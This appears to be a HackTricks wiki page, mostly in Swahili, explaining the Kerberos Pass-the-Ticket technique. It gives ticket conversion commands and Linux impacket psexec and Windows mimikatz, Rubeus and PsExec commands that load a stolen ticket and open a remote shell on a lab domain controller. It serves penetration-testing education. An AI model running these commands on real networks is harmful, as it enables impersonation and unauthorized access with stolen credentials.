hacktricks/windows-hardening/active-directory-methodology/pass-the-ticket.md

Pass the Ticket

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}

Pass The Ticket (PTT)

Katika mbinu ya shambulio ya Pass The Ticket (PTT), washambuliaji hupora tiketi ya uthibitishaji ya mtumiaji badala ya nywila zao au thamani za hash. Tiketi hii iliyoporwa inatumika kisha kufanana na mtumiaji, ikipata ufikiaji usioidhinishwa kwa rasilimali na huduma ndani ya mtandao.

Soma:

• Kuvuna tiketi kutoka Windows
• Kuvuna tiketi kutoka Linux

Kubadilisha tiketi za Linux na Windows kati ya majukwaa

Zana ya ticket_converter inabadilisha muundo wa tiketi kwa kutumia tiketi yenyewe tu na faili ya matokeo.

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

In Windows Kekeo inaweza kutumika.

Shambulio la Pass The Ticket

{% code title="Linux" %}

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

{% endcode %}

{% code title="Windows" %}

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

{% endcode %}

Marejeo

• https://www.tarlogic.com/blog/how-to-attack-kerberos/

Tumia Trickest kujenga na kujiendesha kazi kwa urahisi zenye nguvu za zana za jamii zilizoendelea zaidi duniani.
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}

{% hint style="success" %} Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

{% endhint %}